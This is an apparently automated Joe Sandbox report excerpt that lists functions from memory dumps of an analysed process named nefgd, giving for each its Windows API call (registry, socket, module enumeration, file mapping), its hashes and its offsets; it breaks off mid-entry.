Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 5ec47e5608175a707a42aff092125560f9c654c0feda4f5b49e613303ec38db9
Instruction ID: 708143417e2e817b69b96305aa6c0dcb72c39bfa08bcb0cc287e12616b767d34
Opcode Fuzzy Hash: 5ec47e5608175a707a42aff092125560f9c654c0feda4f5b49e613303ec38db9
Instruction Fuzzy Hash: 0B21A6755093806FD722CB51DC54FA6FFBCEF46210F08849AE945CB652D364E948CBB1

Function 056D26C1 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D274E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: b258cb96dc3ddc0ebb47fa734070440c09680dbaedafa0fb85a7f053af1074d8
Instruction ID: 7cf81f9230eae29d202c26fa957df60130297d6a97a9ac8f4e4053c8a71cce54
Opcode Fuzzy Hash: b258cb96dc3ddc0ebb47fa734070440c09680dbaedafa0fb85a7f053af1074d8
Instruction Fuzzy Hash: 0021D3715093806FD712CB60CC44F96FFB8EF46320F0884DAE984CB652C264A948C775

Function 056D28A4 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 056D294A

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: b7ed1c530916726d9a88c90a6aaa1150ff4f259ec5d542648dcbfd37a3a9975d
Instruction ID: 7aecddf30465ad01f7907fb23d49de3eae0fbd009b2cf6742376f9b63fcf0805
Opcode Fuzzy Hash: b7ed1c530916726d9a88c90a6aaa1150ff4f259ec5d542648dcbfd37a3a9975d
Instruction Fuzzy Hash: D621D0715093C06FD312CB65CC55B66BFB4EF87214F0984CBD884CB693C624A919C7B2

Function 00A6BE78 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 00A6BF0D

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: f75bbc0747b288581e04d64a34e689fd1ae39da561211568bf4597f12e7578c8
Instruction ID: 41d4c199b9b352920a90e4bebc5287bd16b03325811c7cc3ca6e6be6128ffaec
Opcode Fuzzy Hash: f75bbc0747b288581e04d64a34e689fd1ae39da561211568bf4597f12e7578c8
Instruction Fuzzy Hash: B42128B54093806FD7128B219C40BA6BFBCEF47720F0880D6E9808B693D264A909C7B1

Function 056D0257 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 056D02FA

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ed59c611f74aedefa5e3e17a7ca2af46c67c1911667017280d86015d4a02135c
Instruction ID: 53e8ed27bce5023dc71567da18661deee5615d81ceda32460a9086c2095e07c0
Opcode Fuzzy Hash: ed59c611f74aedefa5e3e17a7ca2af46c67c1911667017280d86015d4a02135c
Instruction Fuzzy Hash: 2421D87550E3C06FD3138B25CC51B62BFB4EF47614F0981CBE8848B693D2256919C7B2

Function 056D1156 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 056D11D3

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7671e9ec56c98db7e993158cdc6de3c8228736dbd81ddf18257510c67b053faa
Instruction ID: 40dfb7f0d0c0e96d06ac7cd52054795721df9420c94e9b8647e6c736e7bb7c22
Opcode Fuzzy Hash: 7671e9ec56c98db7e993158cdc6de3c8228736dbd81ddf18257510c67b053faa
Instruction Fuzzy Hash: BE21B072500204AFEB21DF61DC44FAAFBECEF08224F04886AE945CBA51D371E549CBB1

Function 056D17DA Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 056D1859

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 140f7f035170729745f2ccb8541a8cd62f343c3535fc2703b5187e6c782312ba
Instruction ID: 111229f2024c35cfeba064c50140ec55a115648c6f595df14d0c5738c86e579e
Opcode Fuzzy Hash: 140f7f035170729745f2ccb8541a8cd62f343c3535fc2703b5187e6c782312ba
Instruction Fuzzy Hash: 1321AF72904244AFEB20DF51CC44FABFBACEF04214F04886AE945CBA41D774E409CBB1

Function 056D09D6 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 056D0A61

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 7864d4b2124c8683753b0fb7d5f62057e4c41b55cae3b3293b2dcf7693f3a47a
Instruction ID: 9e816f534afdcf561946bfc00a86ad2fca9ceee7cf5d5a5b75d1963b048525e8
Opcode Fuzzy Hash: 7864d4b2124c8683753b0fb7d5f62057e4c41b55cae3b3293b2dcf7693f3a47a
Instruction Fuzzy Hash: 982191715093806FE711CB65CC45FA6FFE8EF05224F08889AE9858B652D375E808CB72

Function 00A6BDA2 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00A6BE21

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: db36b2944eb467977d876b864df76f0c9ce54f824fe5a527ebd300fc3fae94d0
Instruction ID: fcfdb82b9cfcf4f603930d522db67f3ddc20e952f82b11bc357508870685b739
Opcode Fuzzy Hash: db36b2944eb467977d876b864df76f0c9ce54f824fe5a527ebd300fc3fae94d0
Instruction Fuzzy Hash: 82219C71504244AFEB21CF65CC84BA6FBF8EF04724F088869EA45CB651D376E858CB72

Function 00A6B420 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E24), ref: 00A6B4BB

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e878bcfa37a168a2589bb1f1ac9ab14484f1c7a2063e943106307de832c226c4
Instruction ID: 4a5668bdc1887655a4bc7d31440d71c442a3bba3c8c5d376bb96b1e21fa49b69
Opcode Fuzzy Hash: e878bcfa37a168a2589bb1f1ac9ab14484f1c7a2063e943106307de832c226c4
Instruction Fuzzy Hash: C721C8710093806FE721CB11CC45BA6FFB8EF46724F0880DAE9849B592C364A949CB75

Function 056D0846 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 056D08B7

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 3e59787b8dccda13204e2330caac63c209824682f8f9cdb2a8f8eb06002b1712
Instruction ID: d38ca97348bb2f7764af3bf71fb297863dc687cd211002d6782b5ec720c9e144
Opcode Fuzzy Hash: 3e59787b8dccda13204e2330caac63c209824682f8f9cdb2a8f8eb06002b1712
Instruction Fuzzy Hash: 4121C272504244AFEB20DF65DC44FABFBACEF04624F04886AE945CBB41E364E409CBB1

Function 00A6B606 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 00A6B685

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6ad1eed7c9f64941e0f3a90a27bfd288e99c5e5107bb82ee39c66023bc740ad2
Instruction ID: 056d346ff0e04a489e78e9c23b0fa094358348941d53f196f7030967de3aeb4d
Opcode Fuzzy Hash: 6ad1eed7c9f64941e0f3a90a27bfd288e99c5e5107bb82ee39c66023bc740ad2
Instruction Fuzzy Hash: C021CD76400244EEE7219F51CC84FABFBBCEF04324F04845AEA44CBA51D374E94C8AB6

Function 056D222A Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D22B9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: a64a751f8a6db65ad0b38ed0d4a5571534ffff8dad45e14c1933294a6022ef72
Instruction ID: e54267e358cc0e55ce4428bc6e03b06434882b3c7825f18066e852e27af2265a
Opcode Fuzzy Hash: a64a751f8a6db65ad0b38ed0d4a5571534ffff8dad45e14c1933294a6022ef72
Instruction Fuzzy Hash: 4021B6754093806FD7228B51DC44FA6FFB8EF46310F0884DBE9848B653D365A908C776

Function 056D151A Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D159E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 127351e7dd688b9a6212557ae21a31f252f7ab7942bd7d6a531373751a7044b6
Instruction ID: 71f61fe73a9a6efd8ffd1f804837af25692e4c987226269d751fdc79de89499b
Opcode Fuzzy Hash: 127351e7dd688b9a6212557ae21a31f252f7ab7942bd7d6a531373751a7044b6
Instruction Fuzzy Hash: C92180B14093846FD722CB51CC84FABFBACEF45224F08849BE945DB652D374A508CBB5

Function 056D19DA Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 056D1A4E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 57202978f8aa0035b7023505cf0e90193dc0f02169f87b820e2eb58586d90a8a
Instruction ID: dbd03dab149065a081a7a21becf6074ae61b1364d2aedec7c6708549632be35f
Opcode Fuzzy Hash: 57202978f8aa0035b7023505cf0e90193dc0f02169f87b820e2eb58586d90a8a
Instruction Fuzzy Hash: 49219D72904304AFEB20DF55DC45FBAFBACEF04624F08885AED458BA41D775E849CAB1

Function 056D135A Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D13D5

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 06101d497807278cfab6ab9029b436802f881bf1319b66eacdab349a83247c54
Instruction ID: 4e9852cfb991a3b238102af20600a6c6060c9e985869029da5ff68595e5db5df
Opcode Fuzzy Hash: 06101d497807278cfab6ab9029b436802f881bf1319b66eacdab349a83247c54
Instruction Fuzzy Hash: ED218B71904604AFEB21CF51CC84FA6FBE8EF09710F08896AED458BA51D370E859CBB1

Function 056D0D9A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 056D0E0D

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 06a198e0ec6df516410727067587551caf9e56c4e8c2868ab4a7be0cf7efac90
Instruction ID: dc9a3235bd0c3e1e1626a007dd0ed8bdc44e26a9e3195048ddd223f0d0e8f6b8
Opcode Fuzzy Hash: 06a198e0ec6df516410727067587551caf9e56c4e8c2868ab4a7be0cf7efac90
Instruction Fuzzy Hash: D821B3719042449FE720CF65CD49BA6FBE8EF04724F04886AE945CB741E774E409CB75

Function 056D15E8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D1677

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: b54293c3b002ee11e6f0cb0d4b838c9314421622277455774d962aa52d506f87
Instruction ID: e590b8c642f7b11518c28c7cb596eb85431ae786133ec41794449d7195859b88
Opcode Fuzzy Hash: b54293c3b002ee11e6f0cb0d4b838c9314421622277455774d962aa52d506f87
Instruction Fuzzy Hash: 8821C2714093C46FD7228B11DC45FA6FFB8EF46314F0884DAE9848B653D265A908CBB5

Function 056D00E2 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D0161

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c53fbdce0c2e6a0bee6f7a0be8032b58e620251c427d97f1a6e0b15893ee0b85
Instruction ID: 25300817afa635f0b3f963ae309da95ab9b8008d9d0fe9497e0fae57ce836e84
Opcode Fuzzy Hash: c53fbdce0c2e6a0bee6f7a0be8032b58e620251c427d97f1a6e0b15893ee0b85
Instruction Fuzzy Hash: 7C219271409380AFD722CF51DC44FA6FFB8EF45324F08889AE9858B652D365A408CBB5

Function 00A6B70E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 00A6B788

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 55046e0c38892b5a01f2128e6bb8d6b25510e1fb6a5530a62bbdc8f12d1e25d1
Instruction ID: 0f475ba854feb6754dc71416d43c8a62d3e7c5c5805f81fad21317ff512d7d84
Opcode Fuzzy Hash: 55046e0c38892b5a01f2128e6bb8d6b25510e1fb6a5530a62bbdc8f12d1e25d1
Instruction Fuzzy Hash: A4218C76611204AFE720CF55CC84FA6BBFCEF44714F0884AAE945CBA51D760E988CBB1

Function 056D22F6 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 056D237A

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: dd48e09e3e1031731f5e672590fe1736ef6e8075a5264951d3945a2538740c28
Instruction ID: a5d580da0b544f79b4d1c1f302d590ed644a765006f07de855ed56e9436c7c6a
Opcode Fuzzy Hash: dd48e09e3e1031731f5e672590fe1736ef6e8075a5264951d3945a2538740c28
Instruction Fuzzy Hash: 54218E754097809FDB22CF61C894A92FFF4FF06310F0988DEE9858B563D265A819DB71

Function 056D09F6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 056D0A61

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 79b2bfcfb2b2a154e350a9729eb8389eb51b39c4583202d63a164f9071188fc3
Instruction ID: 9c6e7425f0adb41dcece48aa2a4fca981f5364b0b4f12d83d59234480000226d
Opcode Fuzzy Hash: 79b2bfcfb2b2a154e350a9729eb8389eb51b39c4583202d63a164f9071188fc3
Instruction Fuzzy Hash: A621A471505244AFE710CF65CC45BA6FBE8EF04324F08885AED458B742D775E409CB76

Function 056D0344 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 056D03C9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: ac861b81ed309b33f687bca61581ebe6e95bb2de7762152d08318dbed6f0cfef
Instruction ID: ae00f0838ab9ea7e24637fcae2f95f5890a75253d558d658156ac3688ffadff1
Opcode Fuzzy Hash: ac861b81ed309b33f687bca61581ebe6e95bb2de7762152d08318dbed6f0cfef
Instruction Fuzzy Hash: 452181715093806FC312CB658C55B66BFB4EF87624F0981DBE8848B693D224A919CBA2

Function 056D043E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 056D04AA

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 9b7ca406ff7f20bfebadd4ba4ed21d3a0204cb6bbb2deb7f78ecaa2b84fd900e
Instruction ID: e0ed9b4af890dc0e4939c936beea5399b6fa45d5eca2bebb9e44b271ea6ebab8
Opcode Fuzzy Hash: 9b7ca406ff7f20bfebadd4ba4ed21d3a0204cb6bbb2deb7f78ecaa2b84fd900e
Instruction Fuzzy Hash: DF21FF71404240AFEB21CF55CC44FAAFBE8EF04324F04886AE9458BB41D375A419CB72

Function 056D0AF6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 056D0B6A

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 7bc125e146fa4bafb34cc8c309fe22a5faddcd98fb626ef6e1d7c21fb79c26f6
Instruction ID: c2a69ac3dc0ead9d935d49848329bde9cbb397a66352178506353089e2f4cb0f
Opcode Fuzzy Hash: 7bc125e146fa4bafb34cc8c309fe22a5faddcd98fb626ef6e1d7c21fb79c26f6
Instruction Fuzzy Hash: BD21A172804244AFE721CF55CD45FAAFBE8EF08328F048859E9458BB51D375A44DCBB6

Function 056D27DA Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D283E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 59c8a22ff71ef0afe37385012beb23541702cb52c302a0764affcdeaaf11fdbd
Instruction ID: 214bf37129eb440efaba37adaad77a50d2cd878cf233b7d1abb813199144385c
Opcode Fuzzy Hash: 59c8a22ff71ef0afe37385012beb23541702cb52c302a0764affcdeaaf11fdbd
Instruction Fuzzy Hash: 6E11AF75904204AFE720CF55DC84FAAFBE8EF44324F04886AE945CBA91D764E84DCAB1

Function 00A6A73E Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 00A6A7C2

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 73164523842ea4dd8b702ad3efc989fe498ebc52447eedb680c21b342ac049c4
Instruction ID: c8299a5df9012c5c89afaa073d90f9dc7a2adba45b2cbfe1f3e05e03bf5b0e05
Opcode Fuzzy Hash: 73164523842ea4dd8b702ad3efc989fe498ebc52447eedb680c21b342ac049c4
Instruction Fuzzy Hash: 211126715093806FD3118B15DC41FB2FFB8EF86620F19819AEC488BA82D234B919C7B2

Function 056D16EA Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 056D174D

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 90f10e4d98f36d93fa8e69f92ca52742d2dc0e7c8e6fa0f6dfca804571ac364c
Instruction ID: a1669e8a8e28c9d0496d3e254c323ff2e67bbcbabaadd3cca902b34f7e5a0e5d
Opcode Fuzzy Hash: 90f10e4d98f36d93fa8e69f92ca52742d2dc0e7c8e6fa0f6dfca804571ac364c
Instruction Fuzzy Hash: 9611BE71904244AEEB20DB50DC84FBAFBACEF05224F04886AEE448B651D374A80DCAB1

Function 056D075A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D07CC

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b3b29ccda63a31fab990a7432f88ff3b9cff64103ff67551709b521c3f4102a6
Instruction ID: c1e547373dd7f6fb334d126390a011af29dd7a1c33adc211a374ee0f9f207b96
Opcode Fuzzy Hash: b3b29ccda63a31fab990a7432f88ff3b9cff64103ff67551709b521c3f4102a6
Instruction Fuzzy Hash: EB11B471504604AFE721CF55CC88FA6FBECEF04720F04845AE9458BB51E360E449CBB5

Function 056D18EE Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D1958

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: b39490d101cb30696777f070378d65ba3803f8ad616fe418c6fc8698ef72dbfc
Instruction ID: e24c7c671f5e93b5b98067abf3152dc652e6c5cbe9f95a1f067bde11767e549d
Opcode Fuzzy Hash: b39490d101cb30696777f070378d65ba3803f8ad616fe418c6fc8698ef72dbfc
Instruction Fuzzy Hash: 5611B171504244AFEB21CF51CC44FAAFBECEF04724F04886AE9458BA41D374A449CBB5

Function 056D106A Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D10C9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 1511c425955479771d2d233e941c57fd0f8b92d309b3dde505e467e648d68703
Instruction ID: b79c805a1e029224e1bb774c54b35a2ec0cc098944c02ad81b36b2815aad6ce8
Opcode Fuzzy Hash: 1511c425955479771d2d233e941c57fd0f8b92d309b3dde505e467e648d68703
Instruction Fuzzy Hash: F111D072504244AFEB21CF51DC44FAAFBE8EF45324F04886AE9458BA51D774E449CBB1

Function 056D0324 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 056D03C9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 36dcabfc6a382b34055dd75af3200b68fa6493c2d32ecd8b1c084c1c844229bb
Instruction ID: baabbb87d7343119701f792d1953543ada69849cb6ebf140061e39e454b90de9
Opcode Fuzzy Hash: 36dcabfc6a382b34055dd75af3200b68fa6493c2d32ecd8b1c084c1c844229bb
Instruction Fuzzy Hash: 4F11B6715093806FC312CB25CC55B66FFB4EF87624F09819EE8448BA53D625B915C7B2

Function 056D1DC0 Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D1E38

Memory Dump Source

